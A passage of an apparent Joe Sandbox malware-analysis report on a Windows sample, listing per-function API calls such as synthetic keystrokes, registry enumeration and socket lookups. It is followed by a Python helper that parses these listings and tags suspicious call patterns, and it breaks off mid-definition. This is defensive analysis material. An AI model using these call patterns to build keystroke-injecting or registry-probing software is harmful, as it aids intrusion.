                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                    Strings
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                    • String ID: \
                                                    • API String ID: 321622961-2967466578
                                                    • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                    • LoadStringW.USER32(00000000), ref: 00434060
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                    • LoadStringW.USER32(00000000), ref: 00434078
                                                    • _wprintf.LIBCMT ref: 004340A1
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                    • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                    • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                    • __lock.LIBCMT ref: 00417981
                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                    • __lock.LIBCMT ref: 004179A2
                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                    Strings
                                                    Similarity
                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                    • String ID: KERNEL32.DLL$pI
                                                    • API String ID: 637971194-197072765
                                                    • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                    • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                    • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                    APIs
                                                    Similarity
                                                    • API ID: _memmove$_malloc
                                                    • String ID:
                                                    • API String ID: 1938898002-0
                                                    • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                    • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                    • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                    • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                    APIs
                                                      • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                    • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                                                    • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                                      • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                    Similarity
                                                    • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                    • String ID:
                                                    • API String ID: 3771399671-0
                                                    • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                    • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                    • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                    • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                    • _memmove.LIBCMT ref: 0044B555
                                                    • _memmove.LIBCMT ref: 0044B578
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                    • String ID:
                                                    • API String ID: 2737351978-0
                                                    • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                    • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                    • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                    • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                    • __calloc_crt.LIBCMT ref: 00415246
                                                    • __getptd.LIBCMT ref: 00415253
                                                    • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                    • _free.LIBCMT ref: 0041529E
                                                    • __dosmaperr.LIBCMT ref: 004152A9
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Similarity
                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 3638380555-0
                                                    • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                    • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                    • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                    • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                    Strings
                                                    Similarity
                                                    • API ID: Variant$Copy$ClearErrorInitLast
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 3207048006-625585964
                                                    • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                    • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                    • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                    • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                    • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                    • gethostbyname.WSOCK32(?), ref: 004655A6
                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                    • _memmove.LIBCMT ref: 004656CA
                                                    • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                    • WSACleanup.WSOCK32 ref: 00465762
                                                    Similarity
                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                    • String ID:
                                                    • API String ID: 2945290962-0
                                                    • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                    • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                    • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                    • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                    • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                    • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                    Similarity
                                                    • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                    • String ID:
                                                    • API String ID: 1457242333-0
                                                    • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                    • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                    • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                    • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                    Similarity
                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 15295421-0
                                                    • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                    • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                    • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                    • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcstok.LIBCMT ref: 004675B2
                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                    • _wcscpy.LIBCMT ref: 00467641
                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                    • _wcslen.LIBCMT ref: 00467793
                                                    • _wcslen.LIBCMT ref: 004677BD
                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                    Strings
                                                    Similarity
                                                    • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                    • String ID: X
                                                    • API String ID: 780548581-3081909835
                                                    • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                    • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                    • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                    • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                    • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                    • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                    • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                    • CloseFigure.GDI32(?), ref: 0044751F
                                                    • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                    • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                    Similarity
                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                    • String ID:
                                                    • API String ID: 4082120231-0
                                                    • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                    • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                    • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                    • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                    • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                    • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 2027346449-0
                                                    • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                    • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                    • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                    • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • GetMenu.USER32 ref: 0047A703
                                                    • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                    • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                    • _wcslen.LIBCMT ref: 0047A79E
                                                    • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                    • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                    • String ID:
                                                    • API String ID: 3257027151-0
                                                    • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                    • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                    • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                    • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                    APIs
                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastselect
                                                    • String ID:
                                                    • API String ID: 215497628-0
                                                    • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                    • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                    • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                    • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                    APIs
                                                    • GetParent.USER32(?), ref: 0044443B
                                                    • GetKeyboardState.USER32(?), ref: 00444450
                                                    • SetKeyboardState.USER32(?), ref: 004444A4
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                    • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                    • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                    • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00444633
                                                    • GetKeyboardState.USER32(?), ref: 00444648
                                                    • SetKeyboardState.USER32(?), ref: 0044469C
                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                    • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                    • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                    • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
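The two functions above that pair GetKeyboardState/SetKeyboardState with PostMessageW(?,00000100|00000101,VK,?) are posting synthetic WM_KEYDOWN (0x100) and WM_KEYUP (0x101) messages for the modifier keys 0x10 VK_SHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU and 0x5B VK_LWIN, and the earlier listing chains RegConnectRegistryW, RegOpenKeyExW and RegEnumValueW. The Python below is an added triage aid, not part of the Joe Sandbox report: it parses listing lines in exactly this form, decodes those winuser.h constants and tags each function with the call pattern it shows. The SAMPLE text is copied from two of the listings on this page; the tag names and the rules in classify() are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox per-function "APIs" listings (added example).

SAMPLE is copied from two listings on this page; the tag names and the rules
in classify() are this example's own assumptions, not Joe Sandbox output.
"""
import re

# winuser.h constants that the listing prints as raw hex.
WM_NAMES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# One line: "• [Part of subcall function XXXXXXXX: ]Api.MODULE[(args)], ref: XXXXXXXX"
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
INSN_ID = re.compile(r"^\s*•\s*Instruction ID:\s*([0-9a-f]{64})\s*$")


def parse_arg(tok):
    """One argument token -> int, or None for '?' (value unknown to the plugin)."""
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)  # '-00000001' parses as -1


def parse_listing(text):
    """Group API lines by function. A record starts at an 'APIs' header and is
    closed and labelled by the 'Instruction ID' line after its dump-source block."""
    funcs, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"id": None, "apis": []}
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = INSN_ID.match(line)
        if m:
            cur["id"], cur = m.group(1), None
            continue
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            cur["apis"].append({
                "api": m.group("api"), "mod": m.group("mod"),
                "args": [] if raw is None else [parse_arg(a) for a in raw.split(",")],
                "ref": int(m.group("ref"), 16), "subcall": m.group("sub") is not None,
            })
    return funcs


def decode_message(call):
    """(message name, key name) for Post/SendMessageW calls, else None.
    The key name is only resolved for WM_KEYDOWN/WM_KEYUP, where wParam is a VK code."""
    if call["api"] not in ("PostMessageW", "SendMessageW") or len(call["args"]) < 3:
        return None
    msg, wparam = call["args"][1], call["args"][2]
    name = WM_NAMES.get(msg, hex(msg) if msg is not None else "?")
    if name in ("WM_KEYDOWN", "WM_KEYUP"):
        return name, VK_NAMES.get(wparam, hex(wparam) if wparam is not None else "?")
    return name, None


def classify(func):
    """Tag one function by the call patterns in its own (non-subcall) lines."""
    own = [c for c in func["apis"] if not c["subcall"]]
    names = {c["api"] for c in own}
    msgs = [d for d in map(decode_message, own) if d]
    keys = {vk for wm, vk in msgs if wm in ("WM_KEYDOWN", "WM_KEYUP")}
    tags = set()
    # Reads/patches the thread's key-state table, then posts key messages: keystroke synthesis.
    if {"GetKeyboardState", "SetKeyboardState"} <= names and keys:
        tags.add("synthesized-keystrokes:" + ",".join(sorted(keys)))
    if {"RegOpenKeyExW", "RegEnumValueW"} <= names:
        tags.add("registry-value-enumeration")
    if "RegConnectRegistryW" in names:          # can open a remote machine's registry
        tags.add("remote-registry-capable")
    if "GetMenuItemID" in names and any(wm == "WM_COMMAND" for wm, _ in msgs):
        tags.add("menu-item-automation")         # drives another window's menu by item ID
    return tags


def triage(text):
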